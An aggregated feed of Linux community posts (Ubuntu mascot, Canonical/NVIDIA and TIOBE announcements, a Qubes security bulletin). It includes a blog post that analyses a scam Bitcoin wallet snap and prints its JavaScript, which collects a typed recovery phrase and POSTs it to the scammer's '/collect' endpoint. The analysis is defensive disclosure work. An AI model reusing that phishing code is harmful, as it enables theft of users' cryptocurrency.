(中文) 议题揭晓 | 3月23日武汉 Linux 用户组线下沙龙邀您参与!
19 March, 2024 08:53AM by aida
19 March, 2024 08:53AM by aida
On Mastodon, the question came up of how Ubuntu would deal with something like the npm install everything situation. I replied:
Ubuntu is curated, so it probably wouldn’t get this far. If it did, then the worst case is that it would get in the way of CI allowing other packages to be removed (again from a curated system, so people are used to removal not being self-service); but the release team would have no hesitation in removing a package like this to fix that, and it certainly wouldn’t cause this amount of angst.
If you did this in a PPA, then I can’t think of any particular negative effects.
OK, if you added lots of build-dependencies (as well as run-time dependencies) then you might be able to take out a builder. But Launchpad builders already run arbitrary user-submitted code by design and are therefore very carefully sandboxed and treated as ephemeral, so this is hardly novel.
There’s a lot to be said for the arrangement of having a curated system for the stuff people actually care about plus an ecosystem of add-on repositories. PPAs cover a wide range of levels of developer activity, from throwaway experiments to quasi-official distribution methods; there are certainly problems that arise from it being difficult to tell the difference between those extremes and from there being no systematic confinement, but for this particular kind of problem they’re very nearly ideal. (Canonical has tried various other approaches to software distribution, and while they address some of the problems, they aren’t obviously better at helping people make reliable social judgements about code they don’t know.)
For a hypothetical package with a huge number of dependencies, to even try to upload it directly to Ubuntu you’d need to be an Ubuntu developer with upload rights (or to go via Debian, where you’d have to clear a similar hurdle). If you have those, then the first upload has to pass manual review by an archive administrator. If your package passes that, then it still has to build and get through proposed-migration CI before it reaches anything that humans typically care about.
On the other hand, if you were inclined to try this sort of experiment, you’d almost certainly try it in a PPA, and that would trouble nobody but yourself.
Whether it’s via a popular vote, divine providence or magical women lying in ponds distributing swords, it has often been individuals of great renown or noble birth who have ascended to the throne. On the eve of our 20th anniversary this year, we are thrilled to present Noble Numbat, the mascot for Ubuntu 24.04 LTS.
The numbat, a small enigmatic marsupial from Australia may not be the first creature that comes to mind when one ponders nobility. However, looks can be deceiving. These incredible and endangered species are actually pocket size anteaters which live purely on ants that they catch with a tongue a third the length of their body. With a back of black and white stripes much like a kingly robe, they were elected as the state animal emblem of Western Australia. The numbat is a testament that those from humble beginnings can make their mark on the world.
Ubuntu, in the same regard, has grown from a fledgling dream of a more human-friendly Linux into a trusted platform that powers millions of devices around the world. For this LTS (long term support) release we wanted to capture that essence of grandeur and the stateliness of our small Myrmecobiidae friend.
We are very excited to unveil and crown the official mascot wallpaper. Give your computer or phone a majestic upgrade by downloading these Noble Numbat Wallpapers in a variety of formats and sizes.
This majestic wallpaper will be joined by a collection of others from the current incarnation of the Ubuntu Wallpaper Competition. This year’s competition has attracted other Numbat contestants, exciting scenery from the land of the Numbat, and abstract art in honor of their majesty. We cordially invite you to behold the distinguished recipients of this year’s accolades:
In the grand tapestry of our Ubuntu realm, the Ubuntu Wallpaper Competition stands as one avenue for you, esteemed allies and artisans, to contribute to our vibrant community. I invite you to explore the many ways to join our collective endeavor. Venture to https://ubuntu.com/community/contribute and enrich Ubuntu with your creativity and collaboration.
Canonical’s Charmed Kubernetes is now supported on NVIDIA AI Enterprise 5.0. Organisations using Kubernetes deployments on Ubuntu can look forward to a seamless licensing migration to the latest release of the NVIDIA AI Enterprise software platform providing developers the latest AI models and optimised runtimes.
NVIDIA AI Enterprise 5.0 is supported across workstations, data centres, and cloud deployments, new updates include:
Data scientists and developers leveraging NVIDIA frameworks and workflows on Ubuntu across the board now have a single platform to rapidly develop AI applications on the latest generation NVIDIA Tensor Core GPUs. For data scientists and AI/ML developers who would like to deploy their latest AI workloads using kubernetes, it is vital to leverage the most performance out of Tensor Core GPUs through NVIDIA drivers and integrations.
With Charmed Kubernetes from Canonical, several features are provided that are unique to this distribution including inclusion of NVIDIA operators and GPU optimisation features, composability and extensibility using customised integrations through Ubuntu operating system.
Charmed Kubernetes can automatically detect GPU-enabled hardware and install required drivers from NVIDIA repositories. With the release of Charmed Kubernetes 1.29, the NVIDIA GPU Operator charm is available for specific GPU configuration and tuning. With support for GPU operators in Charmed K8s, organisations can rapidly and repeatedly deploy the same models utilising existing on-prem or cloud infrastructure to power AI workloads.
With the NVIDIA GPU operator, users can automatically detect the GPU on the system and install NVIDIA repositories. It also allows for the most optimal configurations through features such as NVIDIA Multi-Instance GPU (MIG) technology in order to leverage the most efficiency out of the Tensor Core GPUs. GPU-optimised instances for AI/ML applications reduce latency and allow for more data processing, freeing for larger-scale applications and more complex model deployment.
Paired with the GPU Operator, the Network Operator enables GPUDirect RDMA (GDR), a key technology that accelerates cloud-native AI workloads by orders of magnitude. GDR allows for optimised network performance, by enhancing data throughput and reducing latency. Another distinctive advantage is its seamless compatibility with NVIDIA’s ecosystem, ensuring a cohesive experience for users. Furthermore, its design, tailored for Kubernetes, ensures scalability and adaptability in various deployment scenarios. This all leads to more efficient networking operations, making it an invaluable tool for businesses aiming to harness the power of GPU-accelerated networking in their Kubernetes environments.
Speaking about these solutions, Marcin “Perk” Stożek, Kubernetes Product Manager at Canonical says: “Charmed Kubernetes validation with NVIDIA AI Enterprise is an important step towards an enterprise-grade, end-to-end solution for AI workloads. By integrating NVIDIA Operators with Charmed Kubernetes, we make sure that customers get what matters to them most: efficient infrastructure for their generative AI workloads.”
Getting started is easy (and free). You can rest assured that Canonical experts are available to help if required.
Try out NVIDIA AI Enterprise with Charmed Kubernetes with a free, 90-day evaluation
Canonical expands its collaboration with NVIDIA through NVIDIA AI Workbench. NVIDIA AI Workbench is supported across workstations, data centres, and cloud deployments.
NVIDIA AI Workbench is an easy-to-use toolkit that allows developers to create, test, and customise AI and machine learning models on their PC or workstation and scale them to the data centre or public cloud. It simplifies interactive development workflows while automating technical tasks that halt beginners and derail experts. Collaborative AI and ML development is now possible on any platform – and for any skill level.
As the preferred OS for data science, artificial intelligence and machine learning, Ubuntu and Canonical play an integral role in AI Workbench capabilities.
This seamless end user experience is made possible thanks to the partnership between Canonical and NVIDIA.
Create, collaborate, and reproduce generative AI and data science projects with ease. Develop and execute while NVIDIA AI Workbench handles the rest:
As the established OS for data science, Ubuntu is now commonly being used for AI/ML development and deployment purposes. This includes development, processing, and iterations of Generative AI (GenAI) workloads. GenAI on both smaller devices and GPUs is increasingly important with the growth of edge AI applications and devices. Applications such as smart cities require more edge devices such as cameras and sensors and thus require more data to be processed at the edge. To make it easier for end users to deploy workloads with more customisability, Ubuntu containers are often preferred due to their ease of use for bare metal deployments. NVIDIA AI Workbench offers Ubuntu container options that are well integrated and suited for GenAI use cases.
With Ubuntu, developers benefit from Canonical’s 20-year track record of Long Term Supported releases, delivering security updates and patching for 5 years. With Ubuntu Pro, organisations can extend that support and security maintenance commitment to 10 years to offload security and compliance from their team so you can focus on building great models. Together, Canonical and Ubuntu provide an optimised and secure environment for AI innovators wherever they are.
Getting started is easy (and free).
Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.
The snap was eventually removed, and some threads were started over on the Snapcraft forum
Nothing has changed it seems, because once again, ANOTHER TEN scam BitCoin wallet apps have been published in the Snap Store today.
Yes, Brenda!
This one has the snappy (sorry) name of exodus-build-96567
published by that not-very-legit looking publisher digisafe00000
. Uh-huh.
Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular cryto wallet brand names.
There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.
Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum effort on the store listing page here. But I’m sure it could fool someone, they usually do.
It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.
Note: Do not install this.
“Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.
Although it is “Safe”, apparently, according to the store listing.
It looks like the exodus-build-96567
snap was only published to the store today. I wonder what happened to builds 1 through 96566!
$ snap info
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
Forget managing a million different wallets and seed phrases.
Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
latest/stable: 8.6.5 2024-03-18 (1) 565kB -
latest/candidate: ↑
latest/beta: ↑
latest/edge: ↑
Here’s the app running in a VM.
If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.
As with all these scam application, all it does is ask for a BitCoin recovery phrase, and with that will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.
When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.
While the snap is still available for download from the store, I grabbed it.
$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
snap ack exodus-build-96567_1.assert
snap install exodus-build-96567_1.snap
I then unpacked the snap to take a peek inside.
unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write
[===========================================================|] 32/32 100%
created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks
There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin
application binary in bin/
.
tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
├── command-chain
│ ├── desktop-launch
│ ├── hooks-configure-fonts
│ └── run
├── gui
│ ├── exodus-build-96567.desktop
│ └── exodus-build-96567.png
└── snapcraft.yaml
8 directories, 11 files
Here’s the snapcraft.yaml
used to build the package. Note it needs network access, unsurprisingly.
name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
Forget managing a million different wallets and seed phrases.
Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots
apps:
exodus-build-96567:
command: bin/exodus-bin
extensions: [gnome]
plugs:
- network
- unity7
- network-status
layout:
/usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0
parts:
exodus-build-96567:
plugin: dump
source: .
organize:
exodus-bin: bin/
For completeness, here’s the snap.yaml
that gets generated at build-time.
name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
Forget managing a million different wallets and seed phrases.
Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
exodus-build-96567:
command: bin/exodus-bin
plugs:
- desktop
- desktop-legacy
- gsettings
- opengl
- wayland
- x11
- network
- unity7
- network-status
command-chain:
- snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
GTK_USE_PORTAL: '1'
LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
desktop:
mount-host-font-cache: false
gtk-3-themes:
interface: content
target: $SNAP/data-dir/themes
default-provider: gtk-common-themes
icon-themes:
interface: content
target: $SNAP/data-dir/icons
default-provider: gtk-common-themes
sound-themes:
interface: content
target: $SNAP/data-dir/sounds
default-provider: gtk-common-themes
gnome-42-2204:
interface: content
target: $SNAP/gnome-platform
default-provider: gnome-42-2204
hooks:
configure:
command-chain:
- snap/command-chain/hooks-configure-fonts
plugs:
- desktop
layout:
/usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
/usr/share/xml/iso-codes:
bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
/usr/share/libdrm:
bind: $SNAP/gnome-platform/usr/share/libdrm
Unlike the previous scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.
If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.
I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.
The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.
var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
⋮
'youth', 'zebra', 'zero', 'zone', 'zoo'];
As the user types words, the application checks the list.
var alreadyAdded = {};
function checkWords() {
var button = document.getElementById("continueButton");
var inputString = document.getElementById("areatext").value;
var words_list = inputString.split(" ");
var foundWords = 0;
words_list.forEach(function(word) {
if (words.includes(word)) {
foundWords++;
}
});
if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {
button.style.backgroundColor = "#511ade";
if (!alreadyAdded[words_list]) {
sendPostRequest(words_list);
alreadyAdded[words_list] = true;
button.addEventListener("click", function() {
renderErrorImport();
});
}
}
else{
button.style.backgroundColor = "#533e89";
}
}
If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a /collect
endpoint on the server.
function sendPostRequest(words) {
var data = {
name: 'exodus',
data: words
};
fetch('/collect', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Error during the request');
}
return response.json();
})
.then(data => {
console.log('Response:', data);
})
.catch(error => {
console.error('There is an error:', error);
});
}
Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.
It also periodically ‘pings’ the /ping
endpoint on the server with a simple payload of {" name":"exodus"}
. Presumably for network connectivity checking, telemetry or seeing which of the scam wallet applications are in use.
function sendPing() {
var data = {
name: 'exodus',
};
fetch('/ping', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Error during the request');
}
return response.json();
})
.then(data => {
console.log('Response:', data);
})
.catch(error => {
console.error('There is an error:', error);
});
}
All of this is done over HTTP, because of course it is. No security needed here!
It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.
I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.
It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.
I’ve reported the app to the Snap Store team.
Until next time, Brenda!
As Canonical approaches its 20th anniversary, we have proven our proficiency in managing a resilient software supply chain. But in the pursuit of excellence, we are always looking to set new standards in software development and embrace cutting-edge quality management practices. This enables us to meet current technological landscape needs. It also paves the way for future innovation, motivating us (as ever) to make open source a key driving force across all industries. In this article I will explore how combining the openness and transparency inherent in open source principles with the right quality management frameworks enables us to lay new foundations for the software-defined industries of tomorrow.
The presence of open source software components in regulated industries has accelerated dramatically in the past couple of years and can be found everywhere, from the smallest industrial component to the largest ship in the world. Such a broad application domain brings additional complexity and heightened expectations that we address the evolving need for quality requirements. While language-specific standards were ways to address guidelines in a relatively simple world, this is not enough anymore. Instead, we need to adopt quality models that are not just a compliance requirement, but effectively a way to evaluate the produced engineering components.
While these types of models are often developed in the context of regulated domains in specific industries, they can provide insights that are impactful across a broad range of applications. For instance, ISO 25010, a quality model that is the cornerstone of a product quality evaluation system, is a great framework to help engineers understand the strengths and weaknesses of specific artefacts using static code analysis. By using an objective, reproducible and independent quality model that follows ISO 25010 standard, Canonical can meet the expectations of a broad spectrum of industries and enable the opportunities that open source software brings.
TIOBE is supporting Canonical in getting an independent overview of its code quality by checking the reliability, security and maintainability of its software sources. The measurements are based on ISO 25010 and follow a strict procedure defined by TIOBE’s Quality Indicator (TQI). TIOBE provides real-time data integrated in programming environments and separate dashboards and makes use of best-in-class third party code checkers for Canonical.
Paul Jansen, CEO of TIOBE states: “We are thrilled to contribute to the success of Canonical. After having checked the code quality of a lot of Canonical’s projects in our independent and regulated way, it is clear that Canonical is scoring far above the average of the 8,000+ commercial projects we measure every day”.
At Canonical, we believe that Quality Management (QM) is an essential pillar in the development of open source software. That is why we added TQI as one additional control point across our software development lifecycle process. In most industries, the expectations towards innovation but also quality attributes, including the ones highlighted by TIOBE Quality Indicator, are very high. The integration of open source software with industry-recognised quality models marks a paramount step towards achieving excellence and leading to the production of superior software solutions.
A prime example of the advantages of independent quality indicators can be seen in the automotive industry. This sector, with its high demands for safety and technological innovation, presents unique challenges that require impeccable quality and robust software solutions. As vehicles become increasingly software-defined, integrating open source software with industry-recognised quality models becomes not just beneficial but essential. Quality management works as a driving force – not just ensuring the reliability and safety of vehicles – but also the key building block for generating trust in open source within the automotive industry.
As Canonical’s Automotive Sector Lead, Bertrand Boisseau, explains: “The results of the collaboration with TIOBE are crucial, especially in the realm of Software Defined Vehicles (SDVs), where the abstraction and decoupling of software and hardware development cycles is key. The TIOBE TiCS framework supports our R&D efforts related to automotive, enabling us to go beyond the expectations of this demanding ecosystem”.
Our approach is designed to address the inherent complexity of modern software stacks, which are by nature heterogeneous. We make use of quality models like ISO 25010 as accelerators to enhance our quality management processes. At Canonical, these models are instrumental in enriching our continuous improvement practices with measurable data, while also aligning with the expectations of the broader enterprise landscape, particularly when combined with the openness and transparency open source software provides.
If you have embarked on a similar journey to measure quality management in your organisation, I would love to hear about your experience. If you’re eager to join our mission in advancing precision engineering, please explore our openings starting with the Technical Manager Automotive and Industrial as well as our Lead Development Lifecycle Engineer positions. Stay tuned to follow our journey towards engineering excellence and connect with me on LinkedIn.
18 March, 2024 06:52AM by aida
We have updated Qubes Security Bulletin (QSB) 101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982). The text of this updated QSB (including a changelog) and its accompanying cryptographic signature are reproduced below, followed by a general explanation of this announcement and authentication instructions.
---===[ Qubes Security Bulletin 101 ]===---
2024-03-12
Register File Data Sampling (XSA-452) and
Intel Processor Return Predictions Advisory (INTEL-SA-00982)
Changelog
----------
2024-03-12: Original QSB
2024-03-17: Add information about INTEL-SA-00982
User action
------------
Continue to update normally [1] in order to receive the security updates
described in the "Patching" section below. No other user action is
required in response to this QSB.
Summary
--------
On 2024-03-12, the Xen Project published XSA-452, "x86: Register File
Data Sampling" [3]:
| Intel have disclosed RFDS, Register File Data Sampling, affecting some
| Atom cores.
|
| This came from internal validation work. There is no information
| provided about how an attacker might go about inferring data from the
| register files.
For more information, see Intel's security advisory. [4]
In addition, Intel published INTEL-SA-00982/CVE-2023-38575 [6] on the
same day:
| Non-transparent sharing of return predictor targets between contexts
| in some Intel® Processors may allow an authorized user to potentially
| enable information disclosure via local access.
Information about this vulnerability is very sparse.
Impact
-------
On systems affected by Register File Data Sampling (RFDS), an attacker
might be able to infer the contents of data previously held in floating
point, vector, and/or integer register files on the same core, including
data from a more privileged context.
On systems affected by INTEL-SA-00982, an attacker might be able to leak
information from other security contexts, but the precise impact is
unclear.
Affected systems
-----------------
At present, Register File Data Sampling (RFDS) is known to affect only
certain Atom cores from Intel. Other Intel CPUs and CPUs from other
hardware vendors are not known to be affected. RFDS affects Atom cores
between the Goldmont and Gracemont microarchitectures. This includes
Alder Lake and Raptor Lake hybrid client systems that have a mix of
Gracemont and other types of cores.
At the time of this writing, Intel has not published information about
which systems INTEL-SA-00982 affects. Systems that are still receiving
microcode updates from Intel [7] and that received a microcode update as
part of the microcode release on 2024-03-12 [5] may be affected, even if
they are not affected by RFDS.
Patching
---------
The following packages contain security updates that address the
vulnerabilities described in this bulletin:
For Qubes 4.1, in dom0:
- Xen packages version 4.14.6-7
- microcode_ctl 2.1-57.qubes1
For Qubes 4.2, in dom0:
- Xen packages version 4.17.3-4
- microcode_ctl 2.1-57.qubes1
These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [2] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [1]
Dom0 must be restarted afterward in order for the updates to take
effect.
If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.
Credits
--------
See the original Xen Security Advisory.
References
-----------
[1] https://www.qubes-os.org/doc/how-to-update/
[2] https://www.qubes-os.org/doc/testing/
[3] https://xenbits.xen.org/xsa/advisory-452.html
[4] https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
[5] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/blob/main/releasenote.md#microcode-20240312
[6] https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00982.html
[7] https://www.intel.com/content/www/us/en/support/articles/000022396/processors.html
--
The Qubes Security Team
https://www.qubes-os.org/security/
At the time of this writing, Marek is traveling and is therefore not available to sign this QSB update. He will sign it when he returns. In the meantime, you can still authenticate his original signature on the original version of this QSB. For more information, see the original QSB-101 announcement.
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmX3fZEACgkQSsGN4REu
FJAHCg/5AYLGAcnMRzZ1JgSJXQLLuQqIXfpNfZWHT4e9u6gkDYcrI4Z4AEzab5Lv
YqSeNbtMys1WCxCUXyPUNG+ZNrD9xcCfmaZuC+MNINwRoAcg+V5+B8cCMU9NUB+V
IquFrepWJcimsBeAvCPkCV4nk1BABqEu0vsViifwFvS0MWr7VFUkQom5/XkXwmZY
uUTrNWSKoJzmzwq3x0yWVNhLmjD2nMg2BKeJUiwpy1wE9Q0w9dLrHEwwewuHP7t1
JAiOFLvEAw55D9Cw8YbOWskIfHWeyhA4a8nrbPVMRTBJAryUgRtDQx6GCcn5uLiM
+/vnYu26UigX9eQy2T/O5fs3ti4BF+/D7XO9QnKXVsmAtSTfvP7/nzY8nWL9SzpB
7cBX5AH9QTHa2Rji/EpqSsZawXXs5pMTWbzObkBORObNgkHUMPOhaM+8qZaEhm5h
DMZrsCHbOsi38pmrXhuIhzY/j5Sk+wp3Wgvkqq4CXO8n7H+jjPNTrMEfcgYI/C8U
U17OvqA/iC/C/z1BRQnhiAp98/fYN6jgNWAGVMBM+XgbrCHExnP/OCH6X5pgTYwY
JbwMyFxv9XuQMDFc9zF4AVPHdAAGssU9qZDZlJg/72Az7J4kxHNlT3m9u02ljmgC
POHJyjO071i6xlCMMEuYyrgT/1qs5NjocpWaXfYSl45a3DWeHMo=
=ZGQ8
-----END PGP SIGNATURE-----
The purpose of this announcement is to inform the Qubes community that a new Qubes security bulletin (QSB) has been published.
A Qubes security bulletin (QSB) is a security announcement issued by the Qubes security team. A QSB typically provides a summary and impact analysis of one or more recently-discovered software vulnerabilities, including details about patching to address them. For a list of all QSBs, see Qubes security bulletins (QSBs).
QSBs tell you what actions you must take in order to protect yourself from recently-discovered security vulnerabilities. In most cases, security vulnerabilities are addressed by updating normally. However, in some cases, special user action is required. In all cases, the required actions are detailed in QSBs.
A PGP signature is a cryptographic digital signature made in accordance with the OpenPGP standard. PGP signatures can be cryptographically verified with programs like GNU Privacy Guard (GPG). The Qubes security team cryptographically signs all QSBs so that Qubes users have a reliable way to check whether QSBs are genuine. The only way to be certain that a QSB is authentic is by verifying its PGP signatures.
A forged QSB could deceive you into taking actions that adversely affect the security of your Qubes OS system, such as installing malware or making configuration changes that render your system vulnerable to attack. Falsified QSBs could sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.
The following command-line instructions assume a Linux system with git
and gpg
installed. (For Windows and Mac options, see OpenPGP software.)
Obtain the Qubes Master Signing Key (QMSK), e.g.:
$ gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
(For more ways to obtain the QMSK, see How to import and authenticate the Qubes Master Signing Key.)
View the fingerprint of the PGP key you just imported. (Note: gpg>
indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)
$ gpg --edit-key 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
gpg> fpr
pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
Important: At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you must authenticate the QMSK out-of-band. Do not skip this step! The standard method is to obtain the QMSK fingerprint from multiple independent sources in several different ways and check to see whether they match the key you just imported. For more information, see How to import and authenticate the Qubes Master Signing Key.
Tip: After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.
Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with q
.
gpg> trust
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
gpg> q
Use Git to clone the qubes-secpack repo.
$ git clone https://github.com/QubesOS/qubes-secpack.git
Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
Import the included PGP keys. (See our PGP key policies for important information about these keys.)
$ gpg --import qubes-secpack/keys/*/*
gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
Verify signed Git tags.
$ cd qubes-secpack/
$ git tag -v `git describe`
object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
